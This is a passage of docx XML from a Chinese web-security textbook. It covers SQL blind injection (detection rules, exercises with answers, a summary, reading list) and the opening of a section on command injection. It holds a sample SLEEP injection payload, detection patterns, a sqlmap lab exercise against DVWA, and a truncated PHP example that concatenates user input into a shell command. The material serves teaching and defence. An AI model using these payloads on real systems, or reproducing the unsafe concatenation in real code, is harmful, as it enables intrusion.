              <w:t xml:space="preserve">BENCHMARK</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的语句；在</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">日志侧检测单参数高频请求（如每分钟超过</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 50 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">次带有</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ASCII(SUBSTRING(…))</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的请求）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">有助于早期预警，但依赖日志留存与实时分析能力，可能产生误报。应结合业务行为基线进行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队特别关注：时间盲注攻击会在访问日志中留下几乎相同但略作改动的请求序列，且某些请求的间隔规律性地包含延迟。通过日志分析或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则可发现此类模式，例如“同一来源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分钟内对同一参数发送超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个仅变动一个数值的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，且某些请求响应时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒”。结合数据库审计日志能够确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等延迟函数执行。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkStart w:id="173" w:name="习题-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题：解释布尔盲注与时间盲注的根本区别，并说明为何统一错误页面可以阻断布尔盲注却无法阻断时间盲注。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从“信道”本质出发，一个利用内容差异，一个利用时间差异。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">参考答案要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：布尔盲注依赖页面内容在条件真假时呈现可见差异；时间盲注则利用条件触发耗时操作，通过测量响应延迟推断信息。统一错误页面抹除了内容差异，因此布尔判定依据消失；但无论页面内容如何统一，延迟依然客观发生，响应时间仍有显著差别，所以时间信道依然可用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题：为什么参数化查询（预编译语句）能够根治包括盲注在内的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注入？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：考虑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句的解析阶段与数据传导方式的改变。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">参考答案要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：参数化查询在数据库系统完成语句的语法解析、编译与优化后，再将用户输入作为纯数据（而非代码）绑定到占位符。此时任何恶意载荷（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND SLEEP(5)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）均被视作普通字符串，不再参与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键词解析，故无法改变原语句的逻辑结构，无论是否利用盲注都无法提取数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将本节所学布尔/时间盲注方法迁移到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“SQL Injection (Blind)”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（Medium/High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别）。尝试手工构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取数据库版本号（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），再利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique=BT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完整枚举表名与用户名。记录所用时间与请求数量，并分析为何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别更难利用（提示：需理解源码中闭合与注释的差异）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkStart w:id="174" w:name="小结-12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盲注是当查询结果无法直接回显时，利用服务器行为的侧信道（布尔内容差异或时间延迟）进行数据窃取的技术。其思想可类比二分搜索，逐字符“问出”数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">布尔盲注的核心是构造条件语句，使页面在真假之间产生可区分的响应，再通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SUBSTRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ASCII</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等函数逐位提取信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间盲注扩展了可用场景，通过条件触发的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等延迟函数将数据传递到响应时间维度，但易受网络波动影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盲注请求次数与被提取数据长度成正比，自动化工具（sqlmap）可高效利用这些信道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御方面，参数化查询是唯一根治手段；统一错误页与查询超时可分别阻断布尔信道与时间信道，但并非绝对；WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与审计日志可作为纵深防御补充。深入了解盲注的侧信道思想，为下一节理解命令注入及构建统一的注入纵深防御体系打下了基础。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="174"/>
    <w:bookmarkStart w:id="175" w:name="延伸阅读白名单-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (A03: Injection)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：注入类漏洞的总纲与分类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide (v4/v5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：其中“Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Blind SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection”章节提供了覆盖多种数据库的测试方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Blind SQL Injection”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块包含丰富的交互式实验与自动化脚本练习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》(第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">版)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：盲注与时间注入技术的经典讲解，涵盖规避与高级利用场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Georgia Weidman《Penetration Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：包含实操环境的盲注演练，适合巩固手工技能。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="175"/>
    <w:bookmarkStart w:id="176" w:name="命令注入与注入纵深防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入与注入纵深防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节建立在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA/SQLi‑labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场搭建，以及本章前两节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联合注入与盲注的基础之上。已学习的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与命令注入的第一性原理——数据与代码边界混淆——在此处被统一收束为注入纵深防御体系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令演示均仅限于读者自建的隔离实验环境、DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi‑labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等官方授权靶机，或已获得书面渗透测试授权的目标系统。实验网络必须与生产网络及公网物理隔离。未经授权对他人系统执行命令注入或使用工具探测漏洞均属违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="176"/>
    <w:bookmarkEnd w:id="177"/>
    <w:bookmarkStart w:id="181" w:name="命令注入与注入纵深防御习题小结延伸-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入与注入纵深防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入（Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入同根同源：攻击者通过应用程序向系统命令行注入恶意代码，使数据越过边界成为操作系统可执行的指令。本章前两节详细剖析了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的联合查询与盲注技术，本节将目光转向操作系统命令注入，并在注入类漏洞的末端构建统一的纵深防御体系。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="178" w:name="命令注入的机理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入的机理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序调用系统命令时，若将用户可控的输入直接拼接到命令字符串中，攻击者便能利用操作系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的命令分隔符注入额外命令。典型的拼接方式如下（以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ping -c 4 "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$_GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ip'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
